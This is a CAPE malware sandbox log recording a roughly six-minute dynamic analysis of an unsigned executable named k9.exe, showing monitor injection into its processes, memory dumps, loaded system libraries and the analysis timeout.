Analysis

Category: FILE
Package: exe
Started: 2020-06-05 14:10:07
Completed: 2020-06-05 14:16:26
Duration: 379 seconds
Options: route = tor

Log:
2020-05-13 09:28:05,787 [root] INFO: Date set to: 20200605T14:10:06, timeout set to: 200
2020-06-05 14:10:06,078 [root] DEBUG: Starting analyzer from: C:\tmpt2nfl3rg
2020-06-05 14:10:06,078 [root] DEBUG: Storing results at: C:\AZpGbR
2020-06-05 14:10:06,078 [root] DEBUG: Pipe server name: \\.\PIPE\mFlbgljrqG
2020-06-05 14:10:06,078 [root] DEBUG: Python path: C:\Users\Louise\AppData\Local\Programs\Python\Python38-32
2020-06-05 14:10:06,078 [root] DEBUG: No analysis package specified, trying to detect it automagically.
2020-06-05 14:10:06,078 [root] INFO: Automatically selected analysis package "exe"
2020-06-05 14:10:06,078 [root] DEBUG: Trying to import analysis package "exe"...
2020-06-05 14:10:06,593 [root] DEBUG: Imported analysis package "exe".
2020-06-05 14:10:06,593 [root] DEBUG: Trying to initialize analysis package "exe"...
2020-06-05 14:10:06,593 [root] DEBUG: Initialized analysis package "exe".
2020-06-05 14:10:07,187 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.browser"...
2020-06-05 14:10:07,296 [root] DEBUG: Imported auxiliary module "modules.auxiliary.browser".
2020-06-05 14:10:07,296 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.curtain"...
2020-06-05 14:10:07,468 [root] DEBUG: Imported auxiliary module "modules.auxiliary.curtain".
2020-06-05 14:10:07,468 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.digisig"...
2020-06-05 14:10:07,484 [root] DEBUG: Imported auxiliary module "modules.auxiliary.digisig".
2020-06-05 14:10:07,484 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.disguise"...
2020-06-05 14:10:07,500 [root] DEBUG: Imported auxiliary module "modules.auxiliary.disguise".
2020-06-05 14:10:07,500 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.human"...
2020-06-05 14:10:07,593 [root] DEBUG: Imported auxiliary module "modules.auxiliary.human".
2020-06-05 14:10:07,593 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.procmon"...
2020-06-05 14:10:07,671 [root] DEBUG: Imported auxiliary module "modules.auxiliary.procmon".
2020-06-05 14:10:07,671 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.screenshots"...
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'time'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'StringIO'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Thread'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Auxiliary'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'NetlogFile'
2020-06-05 14:10:07,671 [modules.auxiliary.screenshots] DEBUG: Importing 'Screenshot'
2020-06-05 14:10:07,671 [lib.api.screenshot] DEBUG: Importing 'math'
2020-06-05 14:10:07,671 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageChops'
2020-06-05 14:10:11,328 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageGrab'
2020-06-05 14:10:11,390 [lib.api.screenshot] DEBUG: Importing 'PIL.ImageDraw'
2020-06-05 14:10:11,453 [modules.auxiliary.screenshots] DEBUG: Imports OK
2020-06-05 14:10:11,453 [root] DEBUG: Imported auxiliary module "modules.auxiliary.screenshots".
2020-06-05 14:10:11,453 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.sysmon"...
2020-06-05 14:10:11,453 [root] DEBUG: Imported auxiliary module "modules.auxiliary.sysmon".
2020-06-05 14:10:11,468 [root] DEBUG: Trying to import auxiliary module "modules.auxiliary.usage"...
2020-06-05 14:10:11,562 [root] DEBUG: Imported auxiliary module "modules.auxiliary.usage".
2020-06-05 14:10:11,562 [root] DEBUG: Trying to initialize auxiliary module "Browser"...
2020-06-05 14:10:11,562 [root] DEBUG: Initialized auxiliary module "Browser".
2020-06-05 14:10:11,562 [root] DEBUG: Trying to start auxiliary module "Browser"...
2020-06-05 14:10:11,562 [root] DEBUG: Started auxiliary module Browser
2020-06-05 14:10:11,578 [root] DEBUG: Trying to initialize auxiliary module "Curtain"...
2020-06-05 14:10:11,578 [root] DEBUG: Initialized auxiliary module "Curtain".
2020-06-05 14:10:11,578 [root] DEBUG: Trying to start auxiliary module "Curtain"...
2020-06-05 14:10:11,578 [root] DEBUG: Started auxiliary module Curtain
2020-06-05 14:10:11,578 [root] DEBUG: Trying to initialize auxiliary module "DigiSig"...
2020-06-05 14:10:11,578 [root] DEBUG: Initialized auxiliary module "DigiSig".
2020-06-05 14:10:11,578 [root] DEBUG: Trying to start auxiliary module "DigiSig"...
2020-06-05 14:10:11,578 [modules.auxiliary.digisig] DEBUG: Checking for a digital signature.
2020-06-05 14:10:13,000 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-06-05 14:10:13,000 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-06-05 14:10:13,000 [root] DEBUG: Started auxiliary module DigiSig
2020-06-05 14:10:13,000 [root] DEBUG: Trying to initialize auxiliary module "Disguise"...
2020-06-05 14:10:13,000 [root] DEBUG: Initialized auxiliary module "Disguise".
2020-06-05 14:10:13,000 [root] DEBUG: Trying to start auxiliary module "Disguise"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Disguise
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Human"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Human".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Human"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Human
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Procmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Procmon".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Procmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Procmon
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Screenshots"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Screenshots".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Screenshots"...
2020-06-05 14:10:13,031 [root] DEBUG: Started auxiliary module Screenshots
2020-06-05 14:10:13,031 [root] DEBUG: Trying to initialize auxiliary module "Sysmon"...
2020-06-05 14:10:13,031 [root] DEBUG: Initialized auxiliary module "Sysmon".
2020-06-05 14:10:13,031 [root] DEBUG: Trying to start auxiliary module "Sysmon"...
2020-06-05 14:10:13,046 [root] DEBUG: Started auxiliary module Sysmon
2020-06-05 14:10:13,046 [root] DEBUG: Trying to initialize auxiliary module "Usage"...
2020-06-05 14:10:13,046 [root] DEBUG: Initialized auxiliary module "Usage".
2020-06-05 14:10:13,046 [root] DEBUG: Trying to start auxiliary module "Usage"...
2020-06-05 14:10:13,046 [root] DEBUG: Started auxiliary module Usage
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a DLL_64 option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader option
2020-06-05 14:10:13,046 [root] INFO: Analyzer: Package modules.packages.exe does not specify a loader_64 option
2020-06-05 14:10:13,171 [lib.api.process] INFO: Successfully executed process from path "C:\Users\Louise\AppData\Local\Temp\k9.exe" with arguments "" with pid 2940
2020-06-05 14:10:13,171 [lib.api.process] INFO: Monitor config for process 2940: C:\tmpt2nfl3rg\dll\2940.ini
2020-06-05 14:10:13,171 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:13,249 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:13,265 [root] DEBUG: Loader: Injecting process 2940 (thread 4988) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:13,265 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:13,265 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:13,265 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2940
2020-06-05 14:10:15,281 [lib.api.process] INFO: Successfully resumed process with pid 2940
2020-06-05 14:10:15,546 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 14:10:15,546 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 14:10:15,562 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 14:10:15,562 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 2940 at 0x700a0000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 14:10:15,562 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\k9.exe".
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,671 [root] INFO: loaded: b'2940'
2020-06-05 14:10:15,671 [root] INFO: Loaded monitor into process with pid 2940
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,671 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:15,687 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd0 amd local view 0x039C0000 to global list.
2020-06-05 14:10:15,812 [root] DEBUG: DLL loaded at 0x72D40000: C:\Windows\system32\SXS (0x5f000 bytes).
2020-06-05 14:10:16,687 [root] DEBUG: DLL loaded at 0x73850000: C:\Windows\system32\asycfilt (0x14000 bytes).
2020-06-05 14:10:17,156 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf8 amd local view 0x04050000 to global list.
2020-06-05 14:10:17,156 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 14:10:17,171 [root] DEBUG: DLL loaded at 0x748F0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 14:10:17,187 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x104 amd local view 0x00420000 to global list.
2020-06-05 14:10:17,437 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\VERSION (0x9000 bytes).
2020-06-05 14:10:17,437 [root] DEBUG: DLL unloaded from 0x00400000.
2020-06-05 14:10:22,656 [root] DEBUG: set_caller_info: Adding region at 0x01E60000 to caller regions list (ntdll::LdrLoadDll).
2020-06-05 14:10:22,656 [root] DEBUG: set_caller_info: Adding region at 0x01EB0000 to caller regions list (kernel32::GetSystemTime).
2020-06-05 14:10:22,671 [root] DEBUG: DumpMemory: Exception occured reading memory address 0x1eb0000
2020-06-05 14:10:22,671 [root] DEBUG: DumpRegion: Failed to dump entire allocation from 0x01EB0000 size 0x400000.
2020-06-05 14:10:22,671 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2050060087221056662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?0x01EB0000;?', ['2940'], 'CAPE')
2020-06-05 14:10:22,718 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\AZpGbR\CAPE\2940_2050060087221056662020 (size 0xffe)
2020-06-05 14:10:22,718 [root] DEBUG: DumpRegion: Dumped stack region from 0x01EB0000, size 0x1000.
2020-06-05 14:10:22,750 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1121244092221056662020', b'9;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?0x01E60000;?', ['2940'], 'CAPE')
2020-06-05 14:10:22,781 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\AZpGbR\CAPE\2940_1121244092221056662020 (size 0x3337)
2020-06-05 14:10:22,781 [root] DEBUG: DumpRegion: Dumped stack region from 0x01E60000, size 0x8000.
2020-06-05 14:10:26,078 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,078 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,187 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,203 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,218 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,218 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,218 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,218 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:26,218 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,234 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,265 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,265 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,281 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,296 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,312 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,312 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,312 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,312 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,312 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,328 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,328 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,328 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,328 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,359 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,359 [root] DEBUG: Loader: Injecting process 2476 (thread 0) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,359 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 14:10:26,375 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2812, handle 0xc4
2020-06-05 14:10:26,375 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,375 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,375 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,390 [root] DEBUG: InjectDllViaIAT: Memory region at 0x07000000 not empty.
2020-06-05 14:10:26,390 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-06-05 14:10:26,390 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,390 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,406 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2113382632161156662020', b'4;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,421 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,421 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,421 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,453 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,453 [root] DEBUG: Loader: Injecting process 2476 (thread 0) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,453 [root] DEBUG: Error 0 (0x0) - GetProcessInitialThreadId: Remote PEB 0x7EFDE000 Local PEB 0x7EFDD000 Local TEB 0x7EFDE000: The operation completed successfully.
2020-06-05 14:10:26,453 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 2812, handle 0xc4
2020-06-05 14:10:26,453 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,468 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,468 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,468 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,484 [root] INFO: Announced 32-bit process name: k9.exe pid: 2476
2020-06-05 14:10:26,484 [lib.api.process] INFO: Monitor config for process 2476: C:\tmpt2nfl3rg\dll\2476.ini
2020-06-05 14:10:26,484 [lib.api.process] INFO: 32-bit DLL to inject is C:\tmpt2nfl3rg\dll\otdfAGB.dll, loader C:\tmpt2nfl3rg\bin\HlSSzmw.exe
2020-06-05 14:10:26,500 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\mFlbgljrqG.
2020-06-05 14:10:26,515 [root] DEBUG: Loader: Injecting process 2476 (thread 2812) with C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,515 [root] DEBUG: Process image base: 0x00400000
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x004014F0)
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,515 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-06-05 14:10:26,515 [root] DEBUG: Successfully injected DLL C:\tmpt2nfl3rg\dll\otdfAGB.dll.
2020-06-05 14:10:26,531 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 2476
2020-06-05 14:10:26,640 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_2122580281161156662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,781 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1239175382161156662020', b'3;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?2476;?', ['2940'], 'CAPE')
2020-06-05 14:10:26,796 [root] WARNING: Unable to open termination event for pid 2940.
2020-06-05 14:10:26,843 [root] INFO: ('dump_file', 'C:\\Users\\Louise\\AppData\\Local\\Temp\\~DFE3607EB907E82968.TMP', '', False, 'files')
2020-06-05 14:10:26,843 [root] DEBUG: Python path set to 'C:\Users\Louise\AppData\Local\Programs\Python\Python38-32'.
2020-06-05 14:10:26,859 [root] DEBUG: Dropped file limit defaulting to 100.
2020-06-05 14:10:26,875 [root] INFO: Disabling sleep skipping.
2020-06-05 14:10:26,890 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-06-05 14:10:26,890 [root] DEBUG: CAPE initialised: 32-bit monitor loaded in process 2476 at 0x700a0000, image base 0x400000, stack from 0x186000-0x190000
2020-06-05 14:10:26,890 [root] INFO: b'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020|2940|0;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?'
2020-06-05 14:10:26,890 [root] DEBUG: Commandline: C:\Users\Louise\AppData\Local\Temp\"C:\Users\Louise\AppData\Local\Temp\k9.exe".
2020-06-05 14:10:26,890 [root] INFO: cape
2020-06-05 14:10:26,906 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020', b'0;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?C:\\Users\\Louise\\AppData\\Local\\Temp\\k9.exe;?', ['2940'], 'procdump')
2020-06-05 14:10:26,921 [root] INFO: ('dump_file', 'C:\\AZpGbR\\CAPE\\2940_1925241130161156662020', '', False, 'files')
2020-06-05 14:10:27,031 [root] INFO: loaded: b'2476'
2020-06-05 14:10:27,031 [root] INFO: Loaded monitor into process with pid 2476
2020-06-05 14:10:29,265 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xd4 amd local view 0x75D90000 to global list.
2020-06-05 14:10:29,265 [root] DEBUG: DLL loaded at 0x75D90000: C:\Windows\syswow64\shell32 (0xc4c000 bytes).
2020-06-05 14:10:29,312 [root] DEBUG: DLL loaded at 0x75900000: C:\Windows\syswow64\wininet (0x1c4000 bytes).
2020-06-05 14:10:29,328 [root] DEBUG: DLL loaded at 0x76F10000: C:\Windows\syswow64\api-ms-win-downlevel-user32-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,343 [root] DEBUG: DLL loaded at 0x75700000: C:\Windows\syswow64\api-ms-win-downlevel-shlwapi-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,359 [root] DEBUG: DLL loaded at 0x754A0000: C:\Windows\syswow64\api-ms-win-downlevel-version-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,359 [root] DEBUG: DLL loaded at 0x73D80000: C:\Windows\system32\version (0x9000 bytes).
2020-06-05 14:10:29,437 [root] DEBUG: DLL loaded at 0x756F0000: C:\Windows\syswow64\api-ms-win-downlevel-normaliz-l1-1-0 (0x3000 bytes).
2020-06-05 14:10:29,484 [root] DEBUG: DLL loaded at 0x75AD0000: C:\Windows\syswow64\normaliz (0x3000 bytes).
2020-06-05 14:10:29,484 [root] DEBUG: DLL loaded at 0x769F0000: C:\Windows\syswow64\iertutil (0x215000 bytes).
2020-06-05 14:10:29,500 [root] DEBUG: DLL loaded at 0x76DF0000: C:\Windows\syswow64\api-ms-win-downlevel-advapi32-l1-1-0 (0x5000 bytes).
2020-06-05 14:10:29,515 [root] DEBUG: DLL loaded at 0x73860000: C:\Windows\system32\Secur32 (0x8000 bytes).
2020-06-05 14:10:29,531 [root] DEBUG: DLL loaded at 0x74A70000: C:\Windows\system32\profapi (0xb000 bytes).
2020-06-05 14:10:29,546 [root] DEBUG: DLL loaded at 0x73850000: C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0 (0x4000 bytes).
2020-06-05 14:10:29,546 [root] DEBUG: DLL loaded at 0x769E0000: C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0 (0x4000 bytes).
2020-06-05 14:10:29,562 [root] DEBUG: DLL loaded at 0x773A0000: C:\Windows\syswow64\WS2_32 (0x35000 bytes).
2020-06-05 14:10:29,578 [root] DEBUG: DLL loaded at 0x77140000: C:\Windows\syswow64\NSI (0x6000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL loaded at 0x737F0000: C:\Windows\system32\winhttp (0x58000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\system32\webio (0x50000 bytes).
2020-06-05 14:10:29,609 [root] DEBUG: DLL unloaded from 0x737F0000.
2020-06-05 14:10:29,640 [root] DEBUG: DLL loaded at 0x74A90000: C:\Windows\system32\mswsock (0x3c000 bytes).
2020-06-05 14:10:29,640 [root] DEBUG: DLL loaded at 0x73840000: C:\Windows\System32\wship6 (0x6000 bytes).
2020-06-05 14:10:29,656 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\IPHLPAPI (0x1c000 bytes).
2020-06-05 14:10:29,671 [root] DEBUG: DLL loaded at 0x74EA0000: C:\Windows\system32\WINNSI (0x7000 bytes).
2020-06-05 14:10:29,671 [root] DEBUG: DLL unloaded from 0x74EB0000.
2020-06-05 14:10:29,687 [root] DEBUG: DLL loaded at 0x73830000: C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0 (0x4000 bytes).
2020-06-05 14:10:29,703 [root] DEBUG: DLL loaded at 0x737E0000: C:\Windows\system32\DNSAPI (0x44000 bytes).
2020-06-05 14:10:29,718 [root] DEBUG: DLL loaded at 0x77150000: C:\Windows\syswow64\CLBCatQ (0x83000 bytes).
2020-06-05 14:10:29,734 [root] DEBUG: DLL loaded at 0x736C0000: C:\Windows\System32\netprofm (0x5a000 bytes).
2020-06-05 14:10:29,750 [root] DEBUG: DLL loaded at 0x737D0000: C:\Windows\System32\nlaapi (0x10000 bytes).
2020-06-05 14:10:29,750 [root] DEBUG: DLL loaded at 0x737C0000: C:\Windows\system32\dhcpcsvc6 (0xd000 bytes).
2020-06-05 14:10:29,765 [root] DEBUG: DLL loaded at 0x74A80000: C:\Windows\System32\wshtcpip (0x5000 bytes).
2020-06-05 14:10:29,765 [root] DEBUG: DLL loaded at 0x757D0000: C:\Windows\syswow64\urlmon (0x124000 bytes).
2020-06-05 14:10:29,781 [root] DEBUG: DLL loaded at 0x737B0000: C:\Windows\system32\rasadhlp (0x6000 bytes).
2020-06-05 14:10:29,796 [root] DEBUG: DLL loaded at 0x736A0000: C:\Windows\system32\dhcpcsvc (0x12000 bytes).
2020-06-05 14:10:29,812 [root] DEBUG: DLL loaded at 0x74A50000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-06-05 14:10:29,828 [root] DEBUG: DLL loaded at 0x748F0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-06-05 14:10:29,843 [root] DEBUG: DLL loaded at 0x74010000: C:\Windows\system32\RpcRtRemote (0xe000 bytes).
2020-06-05 14:10:29,875 [root] DEBUG: DLL loaded at 0x737A0000: C:\Windows\System32\npmproxy (0x8000 bytes).
2020-06-05 14:10:30,171 [root] DEBUG: DLL loaded at 0x73660000: C:\Windows\System32\fwpuclnt (0x38000 bytes).
2020-06-05 14:10:30,203 [root] DEBUG: DLL loaded at 0x74040000: C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\Comctl32 (0x19e000 bytes).
2020-06-05 14:10:30,203 [root] DEBUG: DLL unloaded from 0x74A80000.
2020-06-05 14:10:30,218 [root] DEBUG: DLL unloaded from 0x73840000.
2020-06-05 14:10:31,125 [root] DEBUG: CreateThread: Initialising breakpoints for thread 3928.
2020-06-05 14:10:31,140 [root] DEBUG: DLL unloaded from 0x77990000.
2020-06-05 14:10:34,921 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 2476).
2020-06-05 14:10:34,953 [root] DEBUG: ClearAllBreakpoints: Error: no thread id for thread breakpoints 0x252ec28.
2020-06-05 14:13:35,906 [root] INFO: Analysis timeout hit, terminating analysis.
2020-06-05 14:13:35,906 [lib.api.process] ERROR: Failed to open terminate event for pid 2940
2020-06-05 14:13:35,906 [root] INFO: Terminate event set for process 2940.
2020-06-05 14:13:35,906 [lib.api.process] ERROR: Failed to open terminate event for pid 2476
2020-06-05 14:13:35,921 [root] INFO: Terminate event set for process 2476.
2020-06-05 14:13:35,921 [root] INFO: Created shutdown mutex.
2020-06-05 14:13:36,937 [root] INFO: Shutting down package.
2020-06-05 14:13:36,937 [root] INFO: Stopping auxiliary modules.
2020-06-05 14:13:37,500 [lib.common.results] WARNING: File C:\AZpGbR\bin\procmon.xml doesn't exist anymore
2020-06-05 14:13:37,500 [root] INFO: Finishing auxiliary modules.
2020-06-05 14:13:37,500 [root] INFO: Shutting down pipe server and dumping dropped files.
